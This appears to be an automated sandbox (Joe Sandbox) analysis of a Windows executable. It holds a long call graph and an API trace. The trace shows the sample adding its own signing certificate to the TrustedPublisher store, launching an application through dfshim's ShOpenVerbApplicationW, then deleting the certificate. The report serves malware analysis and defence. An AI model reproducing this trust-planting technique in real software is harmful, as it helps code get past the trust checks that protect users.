6617->6620 6618 ac3264 6618->6610 6628 ac32a5 6618->6628 6619 ac5691 FreeEnvironmentStringsW 6619->6618 6621 ac5657 6620->6621 6620->6627 6622 ac62ff 16 API calls 6621->6622 6623 ac565d 6622->6623 6624 ac5664 WideCharToMultiByte 6623->6624 6625 ac567a 6623->6625 6624->6625 6626 ac4869 _free 15 API calls 6625->6626 6626->6627 6627->6618 6627->6619 6629 ac32ba 6628->6629 6630 ac480c _abort 15 API calls 6629->6630 6631 ac32e1 6630->6631 6632 ac3345 6631->6632 6635 ac480c _abort 15 API calls 6631->6635 6636 ac3347 6631->6636 6641 ac3369 6631->6641 6643 ac4869 _free 15 API calls 6631->6643 6645 ac3eca 6631->6645 6633 ac4869 _free 15 API calls 6632->6633 6634 ac335f 6633->6634 6634->6614 6635->6631 6637 ac3376 15 API calls 6636->6637 6639 ac334d 6637->6639 6640 ac4869 _free 15 API calls 6639->6640 6640->6632 6642 ac474d _abort 6 API calls 6641->6642 6644 ac3375 6642->6644 6643->6631 6646 ac3ee5 6645->6646 6647 ac3ed7 6645->6647 6648 ac47f9 _free 15 API calls 6646->6648 6647->6646 6650 ac3efc 6647->6650 6653 ac3eed 6648->6653 6649 ac473d _abort 21 API calls 6651 ac3ef7 6649->6651 6650->6651 6652 ac47f9 _free 15 API calls 6650->6652 6651->6631 6652->6653 6653->6649 6055 ac55ce GetCommandLineA GetCommandLineW 5879 ac3d8f 5881 ac3d9e 5879->5881 5884 ac3db2 5879->5884 5880 ac4869 _free 15 API calls 5882 ac3dc4 5880->5882 5883 ac4869 _free 15 API calls 5881->5883 5881->5884 5885 ac4869 _free 15 API calls 5882->5885 5883->5884 5884->5880 5886 ac3dd7 5885->5886 5887 ac4869 _free 15 API calls 5886->5887 5888 ac3de8 5887->5888 5889 ac4869 _free 15 API calls 5888->5889 5890 ac3df9 5889->5890 6177 ac430f 6178 ac431a 6177->6178 6182 ac432a 6177->6182 6183 ac4330 6178->6183 6181 ac4869 _free 15 API calls 6181->6182 6184 ac4349 6183->6184 6185 ac4343 6183->6185 6187 ac4869 _free 15 API calls 6184->6187 6186 ac4869 _free 15 API calls 6185->6186 6186->6184 6188 ac4355 6187->6188 6189 ac4869 _free 15 API calls 6188->6189 6190 ac4360 6189->6190 6191 ac4869 _free 15 API calls 6190->6191 6192 ac436b 6191->6192 6193 ac4869 _free 15 API calls 6192->6193 6194 ac4376 6193->6194 6195 ac4869 _free 15 API calls 6194->6195 6196 ac4381 6195->6196 6197 ac4869 _free 15 API calls 6196->6197 6198 ac438c 6197->6198 6199 ac4869 _free 15 API calls 6198->6199 6200 ac4397 6199->6200 6201 ac4869 _free 15 API calls 6200->6201 6202 ac43a2 6201->6202 6203 ac4869 _free 15 API calls 6202->6203 6204 ac43b0 6203->6204 6209 ac41f6 6204->6209 6215 ac4102 6209->6215 6211 ac421a 6212 ac4246 6211->6212 6228 ac4163 6212->6228 6214 ac426a 6214->6181 6216 ac410e ___scrt_is_nonwritable_in_current_image 6215->6216 6223 ac56e2 EnterCriticalSection 6216->6223 6218 ac4118 6221 ac4869 _free 15 API calls 6218->6221 6222 ac4142 6218->6222 6220 ac414f _abort 6220->6211 6221->6222 6224 ac4157 6222->6224 6223->6218 6227 ac572a LeaveCriticalSection 6224->6227 6226 ac4161 6226->6220 6227->6226 6229 ac416f ___scrt_is_nonwritable_in_current_image 6228->6229 6236 ac56e2 EnterCriticalSection 6229->6236 6231 ac4179 6232 ac43d9 _abort 15 API calls 6231->6232 6233 ac418c 6232->6233 6237 ac41a2 6233->6237 6235 ac419a _abort 6235->6214 6236->6231 6240 ac572a LeaveCriticalSection 6237->6240 6239 ac41ac 6239->6235 6240->6239 6654 ac1248 6655 ac1250 6654->6655 6671 ac37f7 6655->6671 6657 ac125b 6678 ac1664 6657->6678 6659 ac191f 4 API calls 6661 ac12f2 6659->6661 6660 ac1270 __RTC_Initialize 6669 ac12cd 6660->6669 6684 ac17f1 6660->6684 6663 ac1289 6663->6669 6687 ac18ab InitializeSListHead 6663->6687 6665 ac129f 6688 ac18ba 6665->6688 6667 ac12c2 6694 ac3891 6667->6694 6669->6659 6670 ac12ea 6669->6670 6672 ac3829 6671->6672 6673 ac3806 6671->6673 6672->6657 6673->6672 6674 ac47f9 _free 15 API calls 6673->6674 6675 ac3819 6674->6675 6676 ac473d _abort 21 API calls 6675->6676 6677 ac3824 6676->6677 6677->6657 6679 ac1674 6678->6679 6680 ac1670 6678->6680 6681 ac191f 4 API calls 6679->6681 6683 ac1681 ___scrt_release_startup_lock 6679->6683 6680->6660 6682 ac16ea 6681->6682 6683->6660 6701 ac17c4 6684->6701 6687->6665 6739 ac3e2a 6688->6739 6690 ac18cb 6691 ac18d2 6690->6691 6692 ac191f 4 API calls 6690->6692 6691->6667 6693 ac18da 6692->6693 6693->6667 6695 ac4424 _abort 33 API calls 6694->6695 6697 ac389c 6695->6697 6696 ac38d4 6696->6669 6697->6696 6698 ac47f9 _free 15 API calls 6697->6698 6699 ac38c9 6698->6699 6700 ac473d _abort 21 API calls 6699->6700 6700->6696 6702 ac17da 6701->6702 6703 ac17d3 6701->6703 6710 ac3cf1 6702->6710 6707 ac3c81 6703->6707 6706 ac17d8 6706->6663 6708 ac3cf1 24 API calls 6707->6708 6709 ac3c93 6708->6709 6709->6706 6713 ac39f8 6710->6713 6716 ac392e 6713->6716 6715 ac3a1c 6715->6706 6717 ac393a ___scrt_is_nonwritable_in_current_image 6716->6717 6724 ac56e2 EnterCriticalSection 6717->6724 6719 ac3948 6725 ac3b40 6719->6725 6721 ac3955 6735 ac3973 6721->6735 6723 ac3966 _abort 6723->6715 6724->6719 6726 ac3b5e 6725->6726 6733 ac3b56 _abort 6725->6733 6727 ac3bb7 6726->6727 6729 ac681b 24 API calls 6726->6729 6726->6733 6728 ac681b 24 API calls 6727->6728 6727->6733 6731 ac3bcd 6728->6731 6730 ac3bad 6729->6730 6732 ac4869 _free 15 API calls 6730->6732 6734 ac4869 _free 15 API calls 6731->6734 6732->6727 6733->6721 6734->6733 6738 ac572a LeaveCriticalSection 6735->6738 6737 ac397d 6737->6723 6738->6737 6740 ac3e48 6739->6740 6744 ac3e68 6739->6744 6741 ac47f9 _free 15 API calls 6740->6741 6742 ac3e5e 6741->6742 6743 ac473d _abort 21 API calls 6742->6743 6743->6744 6744->6690 5891 ac1489 5894 ac1853 5891->5894 5893 ac148e 5893->5893 5895 ac1869 5894->5895 5897 ac1872 5895->5897 5898 ac1806 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 5895->5898 5897->5893 5898->5897 5899 ac4c8a 5904 ac4cbf 5899->5904 5902 ac4ca6 5903 ac4869 _free 15 API calls 5903->5902 5905 ac4cd1 5904->5905 5914 ac4c98 5904->5914 5906 ac4cd6 5905->5906 5907 ac4d01 5905->5907 5908 ac480c _abort 15 API calls 5906->5908 5907->5914 5915 ac681b 5907->5915 5909 ac4cdf 5908->5909 5911 ac4869 _free 15 API calls 5909->5911 5911->5914 5912 ac4d1c 5913 ac4869 _free 15 API calls 5912->5913 5913->5914 5914->5902 5914->5903 5916 ac6826 5915->5916 5917 ac684e 5916->5917 5918 ac683f 5916->5918 5919 ac685d 5917->5919 5924 ac7e13 5917->5924 5920 ac47f9 _free 15 API calls 5918->5920 5931 ac7e46 5919->5931 5923 ac6844 _abort 5920->5923 5923->5912 5925 ac7e1e 5924->5925 5926 ac7e33 HeapSize 5924->5926 5927 ac47f9 _free 15 API calls 5925->5927 5926->5919 5928 ac7e23 5927->5928 5929 ac473d _abort 21 API calls 5928->5929 5930 ac7e2e 5929->5930 5930->5919 5932 ac7e5e 5931->5932 5933 ac7e53 5931->5933 5934 ac7e66 5932->5934 5941 ac7e6f _abort 5932->5941 5935 ac62ff 16 API calls 5933->5935 5936 ac4869 _free 15 API calls 5934->5936 5939 ac7e5b 5935->5939 5936->5939 5937 ac7e99 HeapReAlloc 5937->5939 5937->5941 5938 ac7e74 5940 ac47f9 _free 15 API calls 5938->5940 5939->5923 5940->5939 5941->5937 5941->5938 5942 ac6992 _abort 2 API calls 5941->5942 5942->5941 6056 ac98c5 6058 ac98ed 6056->6058 6057 ac9925 6058->6057 6059 ac991e 6058->6059 6060 ac9917 6058->6060 6065 ac9980 6059->6065 6062 ac9997 16 API calls 6060->6062 6064 ac991c 6062->6064 6066 ac99a0 6065->6066 6067 aca06f __startOneArgErrorHandling 16 API calls 6066->6067 6068 ac9923 6067->6068 5943 ac3d86 5944 ac1f7d ___scrt_uninitialize_crt 7 API calls 5943->5944 5945 ac3d8d 5944->5945 6745 ac9146 IsProcessorFeaturePresent 6241 ac3400 6242 ac3418 6241->6242 6243 ac3412 6241->6243 6244 ac3376 15 API calls 6243->6244 6244->6242 6245 ac1e00 6249 ac1e1e ___except_validate_context_record _ValidateLocalCookies __IsNonwritableInCurrentImage 6245->6249 6246 ac1e9e _ValidateLocalCookies 6248 ac1f27 _ValidateLocalCookies 6249->6246 6250 ac2340 RtlUnwind 6249->6250 6250->6248 6746 ac3d41 6749 ac341b 6746->6749 6750 ac342a 6749->6750 6751 ac3376 15 API calls 6750->6751 6752 ac3444 6751->6752 6753 ac3376 15 API calls 6752->6753 6754 ac344f 6753->6754 6755 ac1442 6756 ac1a6a GetModuleHandleW 6755->6756 6757 ac144a 6756->6757 6758 ac144e 6757->6758 6759 ac1480 6757->6759 6760 ac1459 6758->6760 6764 ac3775 6758->6764 6761 ac3793 _abort 23 API calls 6759->6761 6763 ac1488 6761->6763 6765 ac355e _abort 23 API calls 6764->6765 6766 ac3780 6765->6766 6766->6760 6069 ac9ec3 6070 ac9ecd 6069->6070 6071 ac9ed9 6069->6071 6070->6071 6072 ac9ed2 CloseHandle 6070->6072 6072->6071 6251 ac7d1c 6252 ac522b 46 API calls 6251->6252 6253 ac7d21 6252->6253 6767 ac365d 6768 ac3e89 33 API calls 6767->6768 6769 ac3665 6768->6769 6254 ac7419 6264 ac7fb2 6254->6264 6258 ac7426 6277 ac828e 6258->6277 6261 ac7450 6262 ac4869 _free 15 API calls 6261->6262 6263 ac745b 6262->6263 6281 ac7fbb 6264->6281 6266 ac7421 6267 ac81ee 6266->6267 6268 ac81fa ___scrt_is_nonwritable_in_current_image 6267->6268 6301 ac56e2 EnterCriticalSection 6268->6301 6270 ac8270 6315 ac8285 6270->6315 6272 ac827c _abort 6272->6258 6273 ac8244 DeleteCriticalSection 6275 ac4869 _free 15 API calls 6273->6275 6276 ac8205 6275->6276 6276->6270 6276->6273 6302 ac901c 6276->6302 6278 ac82a4 6277->6278 6280 ac7435 DeleteCriticalSection 6277->6280 6279 ac4869 _free 15 API calls 6278->6279 6278->6280 6279->6280 6280->6258 6280->6261 6282 ac7fc7 ___scrt_is_nonwritable_in_current_image 6281->6282 6291 ac56e2 EnterCriticalSection 6282->6291 6284 ac806a 6296 ac808a 6284->6296 6285 ac7fd6 6285->6284 6290 ac7f6b 61 API calls 6285->6290 6292 ac7465 EnterCriticalSection 6285->6292 6293 ac8060 6285->6293 6288 ac8076 _abort 6288->6266 6290->6285 6291->6285 6292->6285 6299 ac7479 LeaveCriticalSection 6293->6299 6295 ac8068 6295->6285 6300 ac572a LeaveCriticalSection 6296->6300 6298 ac8091 6298->6288 6299->6295 6300->6298 6301->6276 6303 ac9028 ___scrt_is_nonwritable_in_current_image 6302->6303 6304 ac904e 6303->6304 6305 ac9039 6303->6305 6314 ac9049 _abort 6304->6314 6318 ac7465 EnterCriticalSection 6304->6318 6306 ac47f9 _free 15 API calls 6305->6306 6308 ac903e 6306->6308 6310 ac473d _abort 21 API calls 6308->6310 6309 ac906a 6319 ac8fa6 6309->6319 6310->6314 6312 ac9075 6335 ac9092 6312->6335 6314->6276 6573 ac572a LeaveCriticalSection 6315->6573 6317 ac828c 6317->6272 6318->6309 6320 ac8fc8 6319->6320 6321 ac8fb3 6319->6321 6326 ac8fc3 6320->6326 6338 ac7f05 6320->6338 6322 ac47f9 _free 15 API calls 6321->6322 6323 ac8fb8 6322->6323 6325 ac473d _abort 21 API calls 6323->6325 6325->6326 6326->6312 6328 ac828e 15 API calls 6329 ac8fe4 6328->6329 6344 ac732b 6329->6344 6331 ac8fea 6351 ac9d4e 6331->6351 6334 ac4869 _free 15 API calls 6334->6326 6572 ac7479 LeaveCriticalSection 6335->6572 6337 ac909a 6337->6314 6339 ac7f1d 6338->6339 6340 ac7f19 6338->6340 6339->6340 6341 ac732b 21 API calls 6339->6341 6340->6328 6342 ac7f3d 6341->6342 6366 ac89a7 6342->6366 6345 ac734c 6344->6345 6346 ac7337 6344->6346 6345->6331 6347 ac47f9 _free 15 API calls 6346->6347 6348 ac733c 6347->6348 6349 ac473d _abort 21 API calls 6348->6349 6350 ac7347 6349->6350 6350->6331 6352 ac9d5d 6351->6352 6353 ac9d72 6351->6353 6354 ac47e6 __dosmaperr 15 API calls 6352->6354 6355 ac9dad 6353->6355 6360 ac9d99 6353->6360 6357 ac9d62 6354->6357 6356 ac47e6 __dosmaperr 15 API calls 6355->6356 6358 ac9db2 6356->6358 6359 ac47f9 _free 15 API calls 6357->6359 6361 ac47f9 _free 15 API calls 6358->6361 6364 ac8ff0 6359->6364 6529 ac9d26 6360->6529 6363 ac9dba 6361->6363 6365 ac473d _abort 21 API calls 6363->6365 6364->6326 6364->6334 6365->6364 6367 ac89b3 ___scrt_is_nonwritable_in_current_image 6366->6367 6368 ac89bb 6367->6368 6369 ac89d3 6367->6369 6391 ac47e6 6368->6391 6370 ac8a71 6369->6370 6374 ac8a08 6369->6374 6372 ac47e6 __dosmaperr 15 API calls 6370->6372 6375 ac8a76 6372->6375 6394 ac5d23 EnterCriticalSection 6374->6394 6378 ac47f9 _free 15 API calls 6375->6378 6376 ac47f9 _free 15 API calls 6379 ac89c8 _abort 6376->6379 6381 ac8a7e 6378->6381 6379->6340 6380 ac8a0e 6382 ac8a3f 6380->6382 6383 ac8a2a 6380->6383 6384 ac473d _abort 21 API calls 6381->6384 6395 ac8a92 6382->6395 6385 ac47f9 _free 15 API calls 6383->6385 6384->6379 6387 ac8a2f 6385->6387 6389 ac47e6 __dosmaperr 15 API calls 6387->6389 6388 ac8a3a 6444 ac8a69 6388->6444 6389->6388 6392 ac44a8 _abort 15 API calls 6391->6392 6393 ac47eb 6392->6393 6393->6376 6394->6380 6396 ac8ac0 6395->6396 6403 ac8ab9 _ValidateLocalCookies 6395->6403 6397 ac8ac4 6396->6397 6398 ac8ae3 6396->6398 6399 ac47e6 __dosmaperr 15 API calls 6397->6399 6401 ac8b34 6398->6401 6402 ac8b17 6398->6402 6400 ac8ac9 6399->6400 6404 ac47f9 _free 15 API calls 6400->6404 6405 ac8b4a 6401->6405 6447 ac8f8b 6401->6447 6406 ac47e6 __dosmaperr 15 API calls 6402->6406 6403->6388 6408 ac8ad0 6404->6408 6450 ac8637 6405->6450 6407 ac8b1c 6406->6407 6411 ac47f9 _free 15 API calls 6407->6411 6412 ac473d _abort 21 API calls 6408->6412 6414 ac8b24 6411->6414 6412->6403 6417 ac473d _abort 21 API calls 6414->6417 6415 ac8b58 6420 ac8b5c 6415->6420 6421 ac8b7e 6415->6421 6416 ac8b91 6418 ac8beb WriteFile 6416->6418 6419 ac8ba5 6416->6419 6417->6403 6422 ac8c0e GetLastError 6418->6422 6430 ac8b74 6418->6430 6424 ac8bad 6419->6424 6425 ac8bdb 6419->6425 6435 ac8c52 6420->6435 6457 ac85ca 6420->6457 6462 ac8417 GetConsoleCP 6421->6462 6422->6430 6428 ac8bcb 6424->6428 6429 ac8bb2 6424->6429 6482 ac86ad 6425->6482 6476 ac887a 6428->6476 6429->6435 6471 ac878c 6429->6471 6430->6403 6434 ac8c2e 6430->6434 6430->6435 6431 ac47f9 _free 15 API calls 6433 ac8c77 6431->6433 6437 ac47e6 __dosmaperr 15 API calls 6433->6437 6438 ac8c49 6434->6438 6439 ac8c35 6434->6439 6435->6403 6435->6431 6437->6403 6487 ac47c3 6438->6487 6440 ac47f9 _free 15 API calls 6439->6440 6442 ac8c3a 6440->6442 6443 ac47e6 __dosmaperr 15 API calls 6442->6443 6443->6403 6528 ac5d46 LeaveCriticalSection 6444->6528 6446 ac8a6f 6446->6379 6492 ac8f0d 6447->6492 6514 ac7eaf 6450->6514 6452 ac8647 6453 ac4424 _abort 33 API calls 6452->6453 6454 ac864c 6452->6454 6455 ac866f 6453->6455 6454->6415 6454->6416 6455->6454 6456 ac868d GetConsoleMode 6455->6456 6456->6454 6458 ac85ef 6457->6458 6461 ac8624 6457->6461 6459 ac8626 GetLastError 6458->6459 6460 ac9101 WriteConsoleW CreateFileW 6458->6460 6458->6461 6459->6461 6460->6458 6461->6430 6463 ac858c _ValidateLocalCookies 6462->6463 6465 ac847a 6462->6465 6463->6430 6465->6463 6466 ac8500 WideCharToMultiByte 6465->6466 6467 ac72b7 35 API calls __fassign 6465->6467 6470 ac8557 WriteFile 6465->6470 6523 ac6052 6465->6523 6466->6463 6468 ac8526 WriteFile 6466->6468 6467->6465 6468->6465 6469 ac85af GetLastError 6468->6469 6469->6463 6470->6465 6470->6469 6474 ac879b 6471->6474 6472 ac8819 WriteFile 6473 ac885f GetLastError 6472->6473 6472->6474 6475 ac885d _ValidateLocalCookies 6473->6475 6474->6472 6474->6475 6475->6430 6477 ac8889 6476->6477 6478 ac8994 _ValidateLocalCookies 6477->6478 6479 ac890b WideCharToMultiByte 6477->6479 6481 ac8940 WriteFile 6477->6481 6478->6430 6480 ac898c GetLastError 6479->6480 6479->6481 6480->6478 6481->6477 6481->6480 6483 ac86bc 6482->6483 6484 ac872e WriteFile 6483->6484 6485 ac876f _ValidateLocalCookies 6483->6485 6484->6483 6486 ac8771 GetLastError 6484->6486 6485->6430 6486->6485 6488 ac47e6 __dosmaperr 15 API calls 6487->6488 6489 ac47ce _free 6488->6489 6490 ac47f9 _free 15 API calls 6489->6490 6491 ac47e1 6490->6491 6491->6403 6501 ac5dfa 6492->6501 6494 ac8f1f 6495 ac8f38 SetFilePointerEx 6494->6495 6496 ac8f27 6494->6496 6498 ac8f2c 6495->6498 6499 ac8f50 GetLastError 6495->6499 6497 ac47f9 _free 15 API calls 6496->6497 6497->6498 6498->6405 6500 ac47c3 __dosmaperr 15 API calls 6499->6500 6500->6498 6502 ac5e1c 6501->6502 6503 ac5e07 6501->6503 6506 ac47e6 __dosmaperr 15 API calls 6502->6506 6508 ac5e41 6502->6508 6504 ac47e6 __dosmaperr 15 API calls 6503->6504 6505 ac5e0c 6504->6505 6507 ac47f9 _free 15 API calls 6505->6507 6509 ac5e4c 6506->6509 6510 ac5e14 6507->6510 6508->6494 6511 ac47f9 _free 15 API calls 6509->6511 6510->6494 6512 ac5e54 6511->6512 6513 ac473d _abort 21 API calls 6512->6513 6513->6510 6515 ac7ebc 6514->6515 6516 ac7ec9 6514->6516 6517 ac47f9 _free 15 API calls 6515->6517 6518 ac7ed5 6516->6518 6519 ac47f9 _free 15 API calls 6516->6519 6520 ac7ec1 6517->6520 6518->6452 6521 ac7ef6 6519->6521 6520->6452 6522 ac473d _abort 21 API calls 6521->6522 6522->6520 6524 ac4424 _abort 33 API calls 6523->6524 6525 ac605d 6524->6525 6526 ac72d1 __fassign 33 API calls 6525->6526 6527 ac606d 6526->6527 6527->6465 6528->6446 6532 ac9ca4 6529->6532 6531 ac9d4a 6531->6364 6533 ac9cb0 ___scrt_is_nonwritable_in_current_image 6532->6533 6543 ac5d23 EnterCriticalSection 6533->6543 6535 ac9cbe 6536 ac9ce5 6535->6536 6537 ac9cf0 6535->6537 6544 ac9dcd 6536->6544 6539 ac47f9 _free 15 API calls 6537->6539 6540 ac9ceb 6539->6540 6559 ac9d1a 6540->6559 6542 ac9d0d _abort 6542->6531 6543->6535 6545 ac5dfa 21 API calls 6544->6545 6548 ac9ddd 6545->6548 6546 ac9de3 6562 ac5d69 6546->6562 6548->6546 6551 ac5dfa 21 API calls 6548->6551 6558 ac9e15 6548->6558 6549 ac5dfa 21 API calls 6552 ac9e21 CloseHandle 6549->6552 6553 ac9e0c 6551->6553 6552->6546 6554 ac9e2d GetLastError 6552->6554 6557 ac5dfa 21 API calls 6553->6557 6554->6546 6555 ac47c3 __dosmaperr 15 API calls 6556 ac9e5d 6555->6556 6556->6540 6557->6558 6558->6546 6558->6549 6571 ac5d46 LeaveCriticalSection 6559->6571 6561 ac9d24 6561->6542 6563 ac5ddf 6562->6563 6564 ac5d78 6562->6564 6565 ac47f9 _free 15 API calls 6563->6565 6564->6563 6570 ac5da2 6564->6570 6566 ac5de4 6565->6566 6567 ac47e6 __dosmaperr 15 API calls 6566->6567 6568 ac5dcf 6567->6568 6568->6555 6568->6556 6569 ac5dc9 SetStdHandle 6569->6568 6570->6568 6570->6569 6571->6561 6572->6337 6573->6317 6073 ac5fd0 6074 ac5fdc ___scrt_is_nonwritable_in_current_image 6073->6074 6085 ac56e2 EnterCriticalSection 6074->6085 6076 ac5fe3 6086 ac5c8b 6076->6086 6078 ac5ff2 6079 ac6001 6078->6079 6099 ac5e64 GetStartupInfoW 6078->6099 6110 ac601d 6079->6110 6083 ac6012 _abort 6085->6076 6087 ac5c97 ___scrt_is_nonwritable_in_current_image 6086->6087 6088 ac5cbb 6087->6088 6089 ac5ca4 6087->6089 6113 ac56e2 EnterCriticalSection 6088->6113 6091 ac47f9 _free 15 API calls 6089->6091 6092 ac5ca9 6091->6092 6093 ac473d _abort 21 API calls 6092->6093 6095 ac5cb3 _abort 6093->6095 6094 ac5cf3 6121 ac5d1a 6094->6121 6095->6078 6096 ac5cc7 6096->6094 6114 ac5bdc 6096->6114 6100 ac5f13 6099->6100 6101 ac5e81 6099->6101 6105 ac5f1a 6100->6105 6101->6100 6102 ac5c8b 22 API calls 6101->6102 6103 ac5eaa 6102->6103 6103->6100 6104 ac5ed8 GetFileType 6103->6104 6104->6103 6106 ac5f21 6105->6106 6107 ac5f64 GetStdHandle 6106->6107 6108 ac5fcc 6106->6108 6109 ac5f77 GetFileType 6106->6109 6107->6106 6108->6079 6109->6106 6125 ac572a LeaveCriticalSection 6110->6125 6112 ac6024 6112->6083 6113->6096 6115 ac480c _abort 15 API calls 6114->6115 6116 ac5bee 6115->6116 6119 ac59b3 6 API calls 6116->6119 6120 ac5bfb 6116->6120 6117 ac4869 _free 15 API calls 6118 ac5c4d 6117->6118 6118->6096 6119->6116 6120->6117 6124 ac572a LeaveCriticalSection 6121->6124 6123 ac5d21 6123->6095 6124->6123 6125->6112 6574 ac7a10 6577 ac7a27 6574->6577 6578 ac7a49 6577->6578 6579 ac7a35 6577->6579 6581 ac7a51 6578->6581 6582 ac7a63 6578->6582 6580 ac47f9 _free 15 API calls 6579->6580 6583 ac7a3a 6580->6583 6584 ac47f9 _free 15 API calls 6581->6584 6585 ac3f72 __fassign 33 API calls 6582->6585 6588 ac7a22 6582->6588 6586 ac473d _abort 21 API calls 6583->6586 6587 ac7a56 6584->6587 6585->6588 6586->6588 6589 ac473d _abort 21 API calls 6587->6589 6589->6588 6770 ac7351 6771 ac735e 6770->6771 6772 ac480c _abort 15 API calls 6771->6772 6773 ac7378 6772->6773 6774 ac4869 _free 15 API calls 6773->6774 6775 ac7384 6774->6775 6776 ac480c _abort 15 API calls 6775->6776 6780 ac73aa 6775->6780 6777 ac739e 6776->6777 6779 ac4869 _free 15 API calls 6777->6779 6778 ac59b3 6 API calls 6778->6780 6779->6780 6780->6778 6781 ac73b6 6780->6781 5946 ac6893 GetProcessHeap 6782 ac2f53 6783 ac2f7e 6782->6783 6784 ac2f62 6782->6784 6786 ac522b 46 API calls 6783->6786 6784->6783 6785 ac2f68 6784->6785 6787 ac47f9 _free 15 API calls 6785->6787 6788 ac2f85 GetModuleFileNameA 6786->6788 6789 ac2f6d 6787->6789 6790 ac2fa9 6788->6790 6791 ac473d _abort 21 API calls 6789->6791 6805 ac3077 6790->6805 6792 ac2f77 6791->6792 6795 ac31ec 15 API calls 6796 ac2fd3 6795->6796 6797 ac2fdc 6796->6797 6798 ac2fe8 6796->6798 6799 ac47f9 _free 15 API calls 6797->6799 6800 ac3077 33 API calls 6798->6800 6804 ac2fe1 6799->6804 6802 ac2ffe 6800->6802 6801 ac4869 _free 15 API calls 6801->6792 6803 ac4869 _free 15 API calls 6802->6803 6802->6804 6803->6804 6804->6801 6807 ac309c 6805->6807 6806 ac55b6 33 API calls 6806->6807 6807->6806 6809 ac30fc 6807->6809 6808 ac2fc6 6808->6795 6809->6808 6810 ac55b6 33 API calls 6809->6810 6810->6809

                                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                                        Function 00AC1000 Relevance: 54.4, APIs: 27, Strings: 4, Instructions: 199encryptionmemorylibraryCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000000,00000104), ref: 00AC1016
                                                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 00AC1025
                                                                                                                                                                                                                                                        • CertOpenSystemStoreA.CRYPT32(00000000,TrustedPublisher), ref: 00AC1032
                                                                                                                                                                                                                                                        • LocalAlloc.KERNELBASE(00000000,00040000), ref: 00AC1057
                                                                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000000,00040000), ref: 00AC1063
                                                                                                                                                                                                                                                        • CryptQueryObject.CRYPT32(00000001,00000000,00000400,00000002,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00AC1082
                                                                                                                                                                                                                                                        • CryptMsgGetParam.CRYPT32(?,0000000B,00000000,?,?), ref: 00AC10B2
                                                                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000000,?), ref: 00AC10C5
                                                                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000000,00002000), ref: 00AC10F4
                                                                                                                                                                                                                                                        • CryptMsgGetParam.CRYPT32(?,0000000C,00000000,00000000,00002000), ref: 00AC110A
                                                                                                                                                                                                                                                        • CertCreateCertificateContext.CRYPT32(00000001,00000000,00002000), ref: 00AC111A
                                                                                                                                                                                                                                                        • CertAddCertificateContextToStore.CRYPT32(?,00000000,00000001,00000000), ref: 00AC112D
                                                                                                                                                                                                                                                        • CertFreeCertificateContext.CRYPT32(00000000), ref: 00AC1134
                                                                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00AC113E
                                                                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00AC115D
                                                                                                                                                                                                                                                        • CryptMsgGetParam.CRYPT32(?,00000009,00000000,00000000,00040000), ref: 00AC116E
                                                                                                                                                                                                                                                        • CryptMsgGetParam.CRYPT32(?,0000000A,00000000,?,00040000), ref: 00AC1182
                                                                                                                                                                                                                                                        • CertFindAttribute.CRYPT32(1.3.6.1.4.1.311.4.1.1,00000000,?), ref: 00AC1198
                                                                                                                                                                                                                                                        • CertFindAttribute.CRYPT32(1.3.6.1.4.1.311.4.1.1,?,?), ref: 00AC11A9
                                                                                                                                                                                                                                                        • LoadLibraryA.KERNELBASE(dfshim), ref: 00AC11BA
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,ShOpenVerbApplicationW), ref: 00AC11C6
                                                                                                                                                                                                                                                        • Sleep.KERNELBASE(00009C40), ref: 00AC11E8
                                                                                                                                                                                                                                                        • CertDeleteCertificateFromStore.CRYPT32(?), ref: 00AC120B
                                                                                                                                                                                                                                                        • CertCloseStore.CRYPT32(?,00000000), ref: 00AC121A
                                                                                                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00AC1223
                                                                                                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00AC1228
                                                                                                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00AC122D
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2297830490.0000000000AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297784317.0000000000AC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297847746.0000000000ACB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297864149.0000000000AD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297884482.0000000000AD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_ac0000_3coxOaV92n.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Local$Cert$Free$AllocCrypt$CertificateParamStore$Context$AttributeFind$AddressCloseCreateDeleteFileFromLibraryLoadModuleNameObjectOpenProcQuerySleepSystem
                                                                                                                                                                                                                                                        • String ID: 1.3.6.1.4.1.311.4.1.1$ShOpenVerbApplicationW$TrustedPublisher$dfshim
                                                                                                                                                                                                                                                        • API String ID: 335784236-860318880
                                                                                                                                                                                                                                                        • Opcode ID: ed464cb62dff8a8d9d05fc1642c56dbd5d08118d007e8e4449a1679724f22f8f
                                                                                                                                                                                                                                                        • Instruction ID: 8c29362a36d4d93ed80fb36f5d24c6a9e21f0851e0873ef3a22d837c1779a595
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ed464cb62dff8a8d9d05fc1642c56dbd5d08118d007e8e4449a1679724f22f8f
